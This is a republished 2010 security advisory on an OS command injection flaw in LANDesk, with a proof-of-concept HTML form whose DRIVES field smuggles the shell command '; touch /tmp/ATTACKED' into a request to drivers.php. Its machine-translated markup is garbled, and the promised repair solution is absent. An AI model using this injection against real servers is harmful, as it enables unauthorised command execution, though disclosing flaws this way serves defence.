Landesk System Command Injection Vulnerability and repair solution

Source: Internet
Author: User
Tags landesk

Landesk is a network management system that can control desktops, servers, and mobile devices. Landesk does not properly process HTML Tag requests, which may lead to arbitrary code execution.

[+] Info:
~~~~~~~~~
Title: Landesk OS command injection
Advisory Id: CORE-2010-1018
Advisory URL: http://www.coresecurity.com/content/landesk-os-command-injection-vulnerability
Date published: 2010-11-10
Date of last update: 2010-11-10
Vendors contacted: LANDesk
Release mode: Coordinated release

[+] Poc:
~~~~~~~~~
His PoC is an HTML form (that can be hosted on any web site) that makes a request to
[Server]. The parameter DRIVES contains the actual injection. In the example, we generate
File/tmp/ATTACKED to show that arbitrary shell commands can be executed in the server.

<Head> <title> LANDesk PoC </title> <Body>
<Form method = "post" action = "https: // [server]/gsb/drivers. php">
<Input type = "text" name = "DRIVES" value = "; touch/tmp/ATTACKED">
<Input type = "text" name = "SECONDTIME" value = "1">
<Input type = "text" name = "ACTION" value = "getupdate">
<Input type = "submit" value = "Attack! ">
</Form>
</Body>
</Html>

[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/15488
Http://www.landesk.com/
Http://www.nsfocus.net/vulndb/15995

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.